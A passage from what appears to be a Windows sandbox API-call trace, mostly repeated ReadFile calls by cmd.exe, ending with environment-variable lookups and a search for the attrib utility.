lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.017] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.018] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.018] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.018] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.018] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.018] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.018] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.018] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.018] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.018] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.018] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.018] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.018] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.019] ReadFile (in: hFile=0x58, 
lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.019] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.019] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.019] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.019] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.019] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.019] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.019] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.019] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.019] ReadFile 
(in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.019] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.019] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.020] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.020] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.020] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.020] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.020] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.020] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 
[0178.020] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.020] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.020] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.020] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.020] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.020] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.021] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.021] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.021] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, 
lpOverlapped=0x0) returned 1 [0178.021] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.021] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.021] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.021] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.021] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.021] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.021] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.021] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.021] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, 
lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.021] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.022] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.022] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.022] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.022] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.022] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.022] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.022] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.022] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: 
lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.022] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.022] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.022] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.022] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.023] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.023] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.023] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.023] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.023] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, 
lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.023] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.023] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.023] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.023] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.023] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.023] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.023] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.024] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.024] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.024] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.024] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.024] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.024] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.024] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.024] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.024] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.024] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.024] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.024] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.024] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.025] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.025] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.025] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.025] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.025] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.025] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.025] ReadFile (in: hFile=0x58, 
lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.025] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.094] _close (_FileHandle=4) returned 0 [0178.094] FindNextFileW (in: hFindFile=0x281488, lpFindFileData=0x14ee20 | out: lpFindFileData=0x14ee20) returned 0 [0178.095] GetLastError () returned 0x12 [0178.095] FindClose (in: hFindFile=0x281488 | out: hFindFile=0x281488) returned 1 [0178.095] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0178.097] _close (_FileHandle=3) returned 0 [0178.097] GetConsoleTitleW (in: lpConsoleTitle=0x14f258, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0178.098] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0178.098] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0178.098] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0178.098] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x14eaf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eaf4) returned 0xffffffff [0178.098] GetLastError () returned 0x2 [0178.098] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x14eaf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eaf4) returned 0xffffffff [0178.098] 